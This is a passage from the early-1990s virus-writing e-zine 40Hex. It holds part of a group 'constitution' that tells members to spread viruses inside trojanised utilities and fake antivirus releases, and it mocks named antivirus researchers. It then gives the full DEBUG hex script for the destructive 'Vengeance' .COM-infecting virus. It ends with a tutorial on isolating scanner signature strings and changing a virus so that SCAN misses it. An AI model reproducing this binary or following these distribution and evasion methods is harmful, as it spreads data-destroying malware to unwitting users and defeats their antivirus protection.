Section C - IMPLEMENTATION
1) Virus_Name db '[Avocado-B]',0
ARTICLE IV - DISTRIBUTION
Section A - DEFINITION
The term "distribution" herein refers to the transport of
the virus through an infected file to the medium of storage
of a third (unwitting) party.
Section B - INFECTION MEDIUM
The distributor shall infect a file with the virus before
uploading. Suggested files include:
1) Newly released utility programs.
2) "Hacked" versions of popular anti-viral software, i.e.
the version number should be changed, but little else.
3) Beta versions of any program.
The infected file, which must actually do something useful,
will then be uploaded to a board. The following boards are
fair game:
1) PD Boards
2) Lamer boards
3) Boards where the sysop is a dick
No virus shall ever be uploaded, especially by the author,
directly to an antivirus board, such as HomeBase or
Excalibur.
Section C - BINARY AND SOURCE CODE AVAILABILITY
The binary of the virus shall not be made available until at
least two weeks after the initial (illicit) distribution of
the virus. Further, the source code, which need not be made
available, cannot be released until the latest version of
SCAN detects the virus. The source code, should it be made
available, should be written in English.
Section D - DOCUMENTATION
Documentation can be included with the archive containing
the binary of the virus, although this is optional. The
author should include information about the virus suitable
for inclusion in the header of VSUM(2). A simple
description will follow, though the author need not reveal
any "hidden features" of the virus. Note this serves two
purposes:
1) Enable others to effectively spread the virus without
fear of self-infection.
2) Ensure that your virus gets a proper listing in VSUM.
ARTICLE V - AMENDMENTS
Section A - PROCEDURE
To propose an amendment, you must first contact a
PHALCON/SKISM member through one of our member boards.
Leave a message to one of us explaining the proposed change.
It will then be considered for inclusion. A new copy of the
Constitution will then be drafted and placed on member
boards under the filename "PS-CONST.TXT" available for free
download by all virus writers. Additionally, an updated
version of the constitution will be published periodically
in 40HEX.
Section B - AMENDMENTS
None as of this writing.
ARTICLE VI - MISCELLANEOUS
Section A - WHO YOU CAN MAKE FUN OF
This is a list of people who, over the past few years, have
proved themselves to be inept and open to ridicule.
1) Ross M. Greenberg, author of FluShot+
2) Patricia (What's VSUM?) Hoffman.
2) People who post "I am infected by Jerusalem, what do I
do?" or "I have 20 virii, let's trade!"
3) People who don't know the difference between a virus
and a trojan.
4) Lamers and "microwares puppies"
Section B - WHO YOU SHOULDN'T DIS TOO BADLY
This is a list of people who, over the past few years, have
proved themselves to be somewhat less inept and open to
ridicule than most.
1) John McAfee, nonauthor of SCAN
2) Dennis, true author of SCAN
Section C - MOTIVATION
In most cases, the motivation for writing a virus should not
be the pleasure of seeing someone else's system trashed, but
to test one's programming abilities.
ÄÄÄÄÄÄÄÄÄÄ
1 SCAN is a registered trademark of McAfee Associates.
2 VSUM is a registered trademark of that bitch who doesn't know her own
name.
40Hex Number 5 Volume 2 Issue 1 File 006
-------------------------------------------------------------------------------
PHALCON/SKISM Vengeance virus. Released 02/03/92
Stats: Non-Resident .COM infector. in 40Hex Vmag
Infects files larger than 1992 bytes
Size of the virus is about 722 bytes
Note: This Virus is dedicated to the memory of Digital Warfare BBS, which was
online up until January 20th, 1992. On that fateful day, the BBS
computer was confiscated by local authorities. Hopefully the board will
come back up, and be as good as before...
This virus activates the 20th of every month. Just for the fun of it, I'm not
going to tell you what this thing does upon activation. I will say one thing -
unless you have suicidal tendencies, DON'T test it on your own machine, OR the
machine of someone you love. It ain't pretty. It IS destructive. (286+)
It IS noisy. And it IS named appropriately.
Text that can be found in the virus:
*** Vengeance is ours! ***
PHALCON/SKISM '92
As of Scan 86, this virus isn't found. Since it is based on the Violator virus,
other scanners may find it. Oh well.
Have fun with this one, just don't run it on the 20th... at least, not on
YOUR machine!
DecimatoR /PHALCON/SKISM
-------------------------------------------------------------------------------
n veng.com
e 0100 EB 0F 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0110 90 51 BA 27 03 FC 8B F2 83 C6 3D BF 00 01 B9 03
e 0120 00 F3 A4 8B F2 B8 0F FF CD 21 3D 01 01 75 03 E9
e 0130 E3 01 06 B4 2F CD 21 89 5C 33 90 8C 44 35 07 BA
e 0140 92 00 90 03 D6 B4 1A CD 21 90 06 56 8E 06 2C 00
e 0150 BF 00 00 5E 56 83 C6 43 AC B9 00 80 F2 AE B9 04
e 0160 00 AC AE 75 EE E2 FA 5E 07 89 7C 4E 8B FE 83 C7
e 0170 52 8B DE 83 C6 52 8B FE EB 3D 83 7C 4E 00 75 03
e 0180 E9 3F 01 1E 56 26 8E 1E 2C 00 90 8B FE 90 26 8B
e 0190 75 4E 90 83 C7 52 90 90 AC 90 3C 3B 90 74 0B 90
e 01A0 3C 00 74 03 AA EB F0 BE 00 00 5B 1F 89 77 4E 80
e 01B0 FD 5C 74 03 B0 5C AA 89 7F 50 8B F3 83 C6 48 B9
e 01C0 06 00 F3 A4 8B F3 B4 4E BA 52 00 03 D6 B9 03 00
e 01D0 CD 21 EB 04 B4 4F CD 21 73 02 EB 9E 8B 84 A8 00
e 01E0 24 1C 3C 1C 74 EE 81 BC AC 00 2D F7 77 E6 81 BC
e 01F0 AC 00 C8 07 72 DE 8B 7C 50 56 81 C6 B0 00 AC AA
e 0200 3C 00 75 FA 5E B8 00 43 BA 52 00 03 D6 CD 21 89
e 0210 4C 3B B8 01 43 83 E1 FE BA 52 00 03 D6 CD 21 B8
e 0220 02 3D BA 52 00 03 D6 CD 21 73 03 E9 87 00 8B D8
e 0230 B8 00 57 CD 21 89 4C 37 89 54 39 B4 2C CD 21 B4
e 0240 3F B9 03 00 BA 3D 00 03 D6 CD 21 72 53 3D 03 00
e 0250 75 4E B8 02 42 B9 00 00 BA 00 00 CD 21 72 41 8B
e 0260 C8 2D 03 00 89 44 41 81 C1 16 03 8B FE 81 EF 14
e 0270 02 89 0D B4 40 B9 D3 02 8B D6 81 EA 16 02 CD 21
e 0280 72 1E 3D D3 02 75 19 B8 00 42 B9 00 00 BA 00 00
e 0290 CD 21 72 0C B4 40 B9 03 00 8B D6 83 C2 40 CD 21
e 02A0 8B 54 39 8B 4C 37 83 E1 E0 83 C9 1C B8 01 57 CD
e 02B0 21 B4 3E CD 21 B8 01 43 8B 4C 3B BA 52 00 03 D6
e 02C0 CD 21 1E B4 1A 8B 54 33 8E 5C 35 CD 21 1F B4 2A
e 02D0 CD 21 80 FA 14 75 3E B4 09 8B D6 83 C2 00 CD 21
e 02E0 BA 80 00 32 ED B4 05 CD 13 80 FE 01 74 04 FE C6
e 02F0 EB F3 80 FD 20 74 06 32 F6 FE C5 EB E8 80 FA 81
e 0300 74 06 B2 81 32 F6 EB DB B8 09 25 CD 21 B4 02 B2
e 0310 07 CD 21 EB F8 59 33 C0 33 DB 33 D2 33 F6 BF 00
e 0320 01 57 33 FF C2 FF FF 0D 0A 2A 2A 2A 20 56 65 6E
e 0330 67 65 61 6E 63 65 20 69 73 20 6F 75 72 73 21 20
e 0340 2A 2A 2A 0D 0A 24 20 53 4B 49 53 4D 2F 50 68 61
e 0350 6C 63 6F 6E 20 27 39 32 20 24 00 00 00 00 00 00
e 0360 00 00 00 00 CD 20 90 E9 00 00 50 41 54 48 3D 2A
e 0370 2E 43 4F 4D 00 00 00 00 00 00 00 00 00 00 00 00
e 0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03E0 00 00 00 00
rcx
03E3
w
q
-------------------------------------------------------------------------------
40Hex Number 5 Volume 2 Issue 1 File 007
HOW TO MODIFY A VIRUS SO SCAN WON'T CATCH IT
PART II
In Issue 1 of 40Hex, Hellraiser presented a simple (though incredibly
tedious) method of searching for scan strings. In short, this was his
method:
1) Make a small carrier file.
2) Infect the carrier with the virus.
3) Fill parts of the virus with a dummy value until you isolate the
scan string.
4) Modify the virus so it is not detectable, i.e. switch the order of
the instructions.
The problem is, of course, that step 3 takes a maddeningly inordinate
amount of time. I shall present a tip which will save you much time.
The trick is, of course, to find out where the encryption mechanism and
hence the unencrypted portion where the scan string is usually located.
Once the encryption mechanism is located, isolating the scan string is
much simpler.
Of course, the problem is finding the encryption mechanism in the first
place. The simplest method of doing this is using V Communication's
Sourcer 486, or any similar dissassembler. Dissassemble the file and
search for the unencrypted portions. Most of the file will be DBs, so
search for any part which isn't. Once you have located those parts, all
you have to do is subtract 100h from the memory location to find its
physical offset in the file. You now have a general idea of where the
scan string is located, so perform step 3 until you find it.
Ack, you say, what if you don't have Sourcer? Well, all is not lost.
Load up the infected carrier in good old DEBUG. The first instruction
(in COM infections) should be a JMP. Trace (T) into the JMP and you
should be thrown into the area around the encryption mechanism. Use the
memory offset (relative to the PSP segment) and subtract 100h to find
the physical location of the unencrypted portion in the file. Once
again, once you have this, perform step 3. Simple, no?
Sometimes, SCAN looks for the writing portion of the code, which
generally calls INT 21h, function 40h. This is usually, though not
always, located somewhere near the encryption mechanism. If it is
not near there, all you have to do is trace through the virus until
it calls the write file function.
Another method of looking for scan codes is to break the infected carrier
file into a series of 50 byte overlapping chunks. For example, the first
chunk would be from offset 0 to 49, the second from 24 to 74, the third
from 49 to 99, etc. Then use SCAN to see which chunk holds the scan code.
This is by far the easiest, not to mention quickest, method.
One side note on step 1, making the carrier file. Some virii don't
infect tiny files. What you must do is create a larger file (duh).
Simply assemble the following two lines:
int 20h
db 98 dup (0)
(with all the garbage segment declarations and shit, of course) and
you'll have a nice 100 byte carrier which should be sufficient in most
cases, with maybe the exception of the Darth Vaders.
Enjoy!
-------------------------------------------------------------------------------
Dark Angel